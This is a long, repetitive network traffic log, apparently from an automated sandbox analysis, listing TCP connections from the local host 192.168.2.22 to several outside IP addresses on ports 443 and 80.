Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.63.94.214:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
